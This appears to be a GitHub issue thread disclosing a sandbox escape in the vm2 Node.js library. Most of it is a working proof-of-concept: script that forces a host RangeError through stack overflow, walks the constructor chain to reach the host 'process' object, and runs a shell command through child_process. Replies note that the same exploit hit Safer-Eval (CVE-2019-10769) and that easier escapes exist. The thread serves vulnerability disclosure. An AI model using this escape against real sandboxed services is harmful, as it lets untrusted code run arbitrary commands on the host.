It is possible to generate a RangeError: Maximum call stack size exceeded almost anywhere. Sometimes the RangeError will be a host RangeError, which is not Contextified.
I tried to make the code as stable as possible.
```js
"use strict";
const { VM } = require('vm2');

const untrusted = `
const f = Buffer.prototype.write;
const ft = { length: 10, utf8Write() { } };
function r(i) {
  var x = 0;
  try { x = r(i); } catch (e) { }
  if (typeof (x) !== 'number') return x;
  if (x !== i) return x + 1;
  try { f.call(ft); } catch (e) { return e; }
  return null;
}
var i = 1;
while (1) {
  try {
    i = r(i).constructor.constructor("return process")();
    break;
  } catch (x) {
    i++;
  }
}
i.mainModule.require("child_process").execSync("whoami").toString()
`;

try {
  console.log(new VM().run(untrusted));
} catch (x) {
  console.log(x);
}
```
I used 11.8.0.
@XmiliaH Just a heads up, your POC worked against another project as well called Safer-Eval and had the following CVE number assigned to it: CVE-2019-10769. Nice finding!
You can break out far easier: commenthol/safer-eval#10. And to get a host exception one can just supply an invalid argument to get an exception. Using the maximum call stack RangeError is overkill.